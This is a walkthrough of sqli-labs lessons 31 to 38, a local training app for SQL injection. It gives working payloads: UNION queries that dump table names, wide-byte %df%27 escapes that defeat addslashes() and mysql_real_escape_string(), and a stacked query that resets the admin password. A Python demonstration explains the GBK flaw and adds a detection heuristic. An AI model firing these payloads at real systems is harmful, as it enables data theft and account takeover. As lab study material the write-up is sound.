Sqli-labs Advanced Injections(31-38)

Less-31 FUN with WAF

The difference from the earlier lessons is that the closing sequence is now (""); construct the payload directly:

http://localhost:8080/sqli-labs-master/Less-31/?id=8&id=8") and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,5),database()--%20

Less-32 Bypass custom filter adding slashes to dangerous chars

The query is single-quote based, but the single quote is escaped.
Looking at the source, the three characters /, ' and " are filtered.

Consider wide-byte injection.
Construct the payload:

http://localhost/sqli-labs-master/Less-32/?id=1%df%27 and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),database() --%20

Less-33 Bypass addslashes()

Compared with Less-32, the source uses the addslashes() function for filtering.

Construct the payload in the same way:

http://localhost/sqli-labs-master/Less-33/?id=1%df%27 and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),database() --%20

Less-34- Bypass Add SLASHES

This is a POST-based injection, and ' is again escaped by the filter.
For convenience, the parameters are passed through a browser plugin here.
The idea is to convert the input from UTF-8 to UTF-16 or UTF-32;
for example, ' converted to UTF-16 becomes �', which gets through.
Payload:

uname=admin�' and 1=2 union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),database() -- &passwd=123&submit=Submit

Less-35 why care for addslashes()

Compared with Less-33, the statement that has to be closed changes to

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

Construct the payload:

http://localhost/sqli-labs-master/Less-35/?id=1 and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),database() --%20

Less-36 Bypass MySQL Real Escape String

This lesson uses the function mysql_real_escape_string().

Because the database charset was not set to gbk, %df%27 still breaks through.
Construct the payload:

http://localhost/sqli-labs-master/Less-36/?id=1%df%27 and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),database() --%20
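Why the %df%27 trick in Less-32, Less-33 and Less-36 survives a byte-oriented escaper, shown as an added Python example (not sqli-labs code): addslashes()-style escaping inserts 0x5C before the quote, but if the server decodes the bytes as GBK the pair 0xDF 0x5C becomes one two-byte character and the quote is left unescaped. The `addslashes` and `looks_like_wide_byte_probe` helpers are constructed for this demonstration; the fix in practice is to make the escaper and the connection agree on the charset (mysqli_set_charset) or, better, to use prepared statements.

```python
# Constructed demonstration of the wide-byte (GBK) bypass of addslashes().
# Not sqli-labs code; the helpers below are written for this example only.

def addslashes(data: bytes) -> bytes:
    """Byte-oriented escaping like PHP's addslashes(): prefix ' " \\ and NUL with 0x5C."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)  # the backslash that is supposed to neutralise the quote
        out.append(b)
    return bytes(out)


def server_view(escaped: bytes, charset: str) -> str:
    """Decode the escaped bytes the way a server using `charset` would see them."""
    return escaped.decode(charset, errors="replace")


def quote_still_escaped(user_input: bytes, charset: str) -> bool:
    """True if every single quote the server sees is still preceded by a backslash.

    With charset="gbk" the input b"1\\xdf'" yields False: 0xDF 0x5C is decoded as
    a single CJK character, so the backslash is swallowed and the quote is live.
    """
    text = server_view(addslashes(user_input), charset)
    return all(i > 0 and text[i - 1] == "\\"
               for i, ch in enumerate(text) if ch == "'")


def looks_like_wide_byte_probe(user_input: bytes) -> bool:
    """Detection heuristic: a GBK lead byte (0x81-0xFE) directly before a quote or backslash."""
    return any(0x81 <= user_input[i] <= 0xFE and user_input[i + 1] in b"'\"\\"
               for i in range(len(user_input) - 1))


if __name__ == "__main__":
    probe = b"1\xdf'"  # the %df%27 prefix from the lesson payloads
    print("gbk  :", quote_still_escaped(probe, "gbk"))    # False: escape defeated
    print("utf-8:", quote_still_escaped(probe, "utf-8"))  # True: escape intact
    print("probe:", looks_like_wide_byte_probe(probe))    # True: worth logging
```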

Less-37- MySQL_real_escape_string

The POST-based version of Less-36; the principle is the same as in Less-34.
Payload:

uname=admin�' and 1=2 union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),database() -- &passwd=123&submit=Submit

Less-38 stacked Query

This lesson involves stacked queries (Stacked Query).
The back end uses mysqli_multi_query(), so stacked injection is possible.

Data-retrieval payload:

http://localhost/sqli-labs-master/Less-38/?id=8' and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),database() --%20

Password-change payload:

http://localhost/sqli-labs-master/Less-38/?id=8';update users set password='12345' where username='admin';--%20

Because the SELECT runs before the password is updated, submit the request once more to see the changed password.